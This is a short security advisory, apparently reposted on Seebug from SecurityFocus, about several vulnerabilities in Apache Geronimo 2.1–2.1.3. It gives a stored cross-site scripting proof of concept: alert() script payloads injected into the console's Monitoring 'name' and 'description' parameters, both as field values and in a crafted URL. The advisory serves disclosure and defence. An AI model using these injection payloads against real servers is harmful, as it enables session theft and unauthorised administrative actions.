source: http://www.securityfocus.com/bid/34562/info Apache Geronimo Application Server is prone to multiple remote vulnerabilities: - Multiple directory-traversal vulnerabilities - A cross-site scripting vulnerability - Multiple HTML-injection vulnerabilities - A cross-site request-forgery vulnerability Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, execute arbitrary script code, steal cookie-based authentication credentials, and perform certain administrative actions. Apache Geronimo 2.1 through 2.1.3 are vulnerable. http://www.example.com/console/portal/Server/Monitoring Vulnerable parameters: "name", "ip", "username", "description". Attacker can inject scripts into monitorings. Example [Monitoring - Create View]: name = <script>alert('DSecRG XSS')</script> description = </textarea><script>alert("DSecRG XSS")</script> or http://www.example.com/console/portal//Server/Monitoring/__ac0x3monitoring0x2monitoring!126896788|0/__pm0x3monitoring0x2monitoring!126896788|0_edit?action=saveA ddView&name="><script>alert("DSecRG XSS")</script>&description=</textarea><script>alert("DSecRG XSS")</script>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论